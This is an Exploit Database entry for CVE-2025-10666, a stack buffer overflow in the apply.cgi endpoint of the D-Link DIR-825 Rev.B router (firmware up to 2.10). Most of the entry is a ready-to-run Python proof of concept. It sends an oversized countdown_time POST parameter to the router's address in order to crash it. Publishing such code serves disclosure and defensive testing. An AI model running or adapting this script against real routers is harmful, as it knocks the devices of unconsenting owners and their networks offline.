[hardware] D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS) EDB-ID: 52469 CVE: 2025-10666 EDB Verified: Author: BEATRIZ FRESNO NAUMOVA Type: HARDWARE Exploit:   /   Platform: MULTIPLE Date: 2026-02-02 Vulnerable App: # Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS) # Google Dork: N/A # Date: 2025-09-25 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://www.dlink.com/ # Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp # Version: DIR-825 Rev.B <= 2.10 # Tested on: DIR-825 Rev.B physical hardware, local network # CVE: CVE-2025-10666 # # Description: # A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the # D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter. # This PoC sends an overly long POST parameter to crash the process. import requests TARGET = "http://192.168.0.1/apply.cgi" # Change this to the router's IP LENGTH = 4000 # Adjust length for testing / fuzzing PAYLOAD = "1" * LENGTH headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", "Referer": "http://192.168.0.1/", } data = { "countdown_time": PAYLOAD } try: print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}") r = requests.post(TARGET, headers=headers, data=data, timeout=5) print(f"[+] Status Code: {r.status_code}") print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.") except Exception as e: print(f"[-] Failed to send exploit: {e}") Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services